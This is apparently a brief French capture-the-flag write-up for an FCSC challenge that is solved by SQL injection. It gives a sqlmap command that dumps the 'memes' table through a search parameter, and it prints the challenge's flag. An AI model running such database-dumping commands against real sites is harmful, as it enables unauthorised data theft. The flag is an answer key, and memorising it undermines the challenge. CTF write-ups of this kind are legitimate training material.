Principe:
Exploiter une SQL injection (via SQLmap parce qu'on n'a pas lu la FAQ)
Infos (cf menu latéral):
🚩 Flaggué! +100 points gagnés —
💾 Téléchargez les fichiers du challenge
FCSC{1D32671928B0DFD5E0B92B57871B1D49}
Le challenge
Partie 1: SQL(map)injection
sqlmap -D public -T memes --dump -u '…/?search=lexluthor'
3f5ce7b380dd03c3e71a29b2560323d058ce481fc7f3cdd505b02526af7d484e.jpg on trouve le flagFlag: FCSC{1D32671928B0DFD5E0B92B57871B1D49}